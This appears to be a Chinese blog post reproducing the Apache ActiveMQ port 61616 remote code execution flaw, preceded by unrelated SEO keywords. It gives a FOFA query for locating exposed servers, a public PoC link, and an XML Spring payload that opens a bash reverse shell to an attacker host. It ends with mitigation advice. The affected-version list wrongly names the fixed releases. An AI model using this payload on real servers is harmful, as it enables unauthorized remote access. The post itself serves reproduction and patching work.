个人网站 备案,建设厅注册中心网站,php企业门户网站,wordpress手机端侧面小工具0x01 产品简介 ActiveMQ是一个开源的消息代理和集成模式服务器#xff0c;它支持Java消息服务(JMS) API。它是Apache Software Foundation下的一个项目#xff0c;用于实现消息中间件#xff0c;帮助不同的应用程序或系统之间进行通信。
0x02 漏洞概述 Apache ActiveMQ 中存…0x01 产品简介 ActiveMQ是一个开源的消息代理和集成模式服务器它支持Java消息服务(JMS) API。它是Apache Software Foundation下的一个项目用于实现消息中间件帮助不同的应用程序或系统之间进行通信。
0x02 漏洞概述 Apache ActiveMQ 中存在远程代码执行漏洞Apache ActiveMQ在默认安装下开放了61616服务端口而该端口并没有对传入数据进行适当的过滤从而使攻击者能够构造恶意数据以实现远程代码执行。
0x03 影响范围
Apache ActiveMQ 5.18.3
Apache ActiveMQ 5.17.6
Apache ActiveMQ 5.16.7
Apache ActiveMQ 5.15.16
0x04 复现环境
FOFAappAPACHE-ActiveMQ port61616 0x05 漏洞复现
PoC地址https://github.com/trganda/ActiveMQ-RCE
把项目Get到本地导入IDEA中运行 直接运行会发现报错java: 警告: 源发行版 11 需要目标发行版 11
PS:这种一般是你idea的 配置文件iml 与 项目中 配置的jdk版本是不一致导致的 这里需要安装jdk11配置项目 漏洞利用
修改Main.java以下两处 反弹shell
将rce.xml上传至vps
?xml version1.0 encodingUTF-8 ?
beans xmlnshttp://www.springframework.org/schema/beansxmlns:xsihttp://www.w3.org/2001/XMLSchema-instancexsi:schemaLocationhttp://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsdbean idpb classjava.lang.ProcessBuilder init-methodstartconstructor-arglistvaluebash/valuevalue-c/valuevalue![CDATA[bash -i /dev/tcp/your-ip/6666 01]]/value/list/constructor-arg/bean利用python开启http服务 nc开启监听 运行Main.java 成功反弹shell 0x06 修复建议
临时缓解方案
通过网络ACL策略限制访问来源例如只允许来自特定IP地址或地址段的访问请求。
升级修复方案
目前官方已通过限制反序列化类只能为Throwable的子类的方式来修复此漏洞。建议受影响用户可以更新到
Apache ActiveMQ 5.18.3
Apache ActiveMQ 5.17.6
Apache ActiveMQ 5.16.7
Apache ActiveMQ 5.15.16
https://github.com/apache/activemq/tags
